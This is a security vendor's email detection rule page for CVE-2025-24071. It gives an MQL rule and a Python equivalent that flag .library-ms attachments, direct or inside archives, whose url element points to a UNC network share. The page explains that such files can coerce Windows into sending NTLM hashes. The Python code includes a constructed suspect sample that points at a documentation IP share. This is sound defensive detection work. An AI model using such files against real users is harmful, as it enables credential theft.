• Sublime Core Feed
Critical Severity

Attachment: CVE-2025-24071 - Microsoft Windows File Explorer Spoofing Vulnerability

Labels

Credential Phishing
Scripting
Macros
Exploit
Archive analysis
Content analysis
File analysis

Description

Detects a Windows library file (.library-ms) containing a network (UNC) path, either attached directly or inside an archive. This file type can be used to coerce Windows into sending the user's NTLM hash to a malicious network location.

References

Sublime Security
Created Mar 21st, 2025 • Last updated Mar 21st, 2025
Feed Source
Sublime Core Feed
Source
GitHub
type.inbound
and any(attachments,
        // handle directly attached files first
        (
          .file_extension == "library-ms"
          // and contains a url with the \\
          and strings.icontains(file.parse_text(.).text, '<url>\\')
        )
        // handle library-ms files inside of archives
        or (
          .file_extension in $file_extensions_common_archives
          and any(file.explode(.),
                  // the exploded archive contained a file with the library-ms extension
                  .file_extension == "library-ms"
                  // and the strings in that file contain the required url variable
                  and any(.scan.strings.strings, strings.contains(., '<url>\\'))
          )
        )
)
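The same detection logic in Python, as an added example rather than Sublime's own code or a translation of the MQL above: it parses the .library-ms XML for a `<url>` element holding a UNC path, falls back to the rule's raw `<url>\\` substring test when the XML is malformed, and inspects `.library-ms` members of zip archives. The archive list is an assumption standing in for `$file_extensions_common_archives`, and all samples are constructed.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

ARCHIVE_EXTS = {"zip"}  # assumption: stand-in for $file_extensions_common_archives
UNC_URL_RE = re.compile(rb"<url>\s*\\\\", re.IGNORECASE)  # raw-string check, as in the rule


def library_ms_has_unc_url(data: bytes) -> bool:
    """True if a .library-ms body has a <url> element pointing at a UNC path (\\\\host\\share)."""
    try:
        root = ET.fromstring(data)
        for el in root.iter():
            local = el.tag.rsplit("}", 1)[-1].lower()  # strip the XML namespace
            if local == "url" and (el.text or "").lstrip().startswith("\\\\"):
                return True
        return False
    except ET.ParseError:
        # malformed XML: fall back to the same substring test the MQL rule uses
        return bool(UNC_URL_RE.search(data))


def attachment_matches(filename: str, data: bytes) -> bool:
    """Mirror the rule: a direct .library-ms attachment, or one inside a supported archive."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext == "library-ms":
        return library_ms_has_unc_url(data)
    if ext in ARCHIVE_EXTS:
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                return any(info.filename.lower().endswith(".library-ms")
                           and library_ms_has_unc_url(zf.read(info))
                           for info in zf.infolist())
        except zipfile.BadZipFile:
            return False
    return False


def make_zip(member_name: str, member_data: bytes) -> bytes:
    """Build an in-memory zip holding one member (used to construct test archives)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, member_data)
    return buf.getvalue()


# constructed samples: a local library path, and the same file pointing at a UNC share (TEST-NET address)
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList><searchConnectorDescription>
    <simpleLocation><url>C:\\Users\\Public\\Documents</url></simpleLocation>
  </searchConnectorDescription></searchConnectorDescriptionList>
</libraryDescription>"""
SUSPECT = BENIGN.replace(b"C:\\Users\\Public\\Documents", b"\\\\203.0.113.10\\share")
```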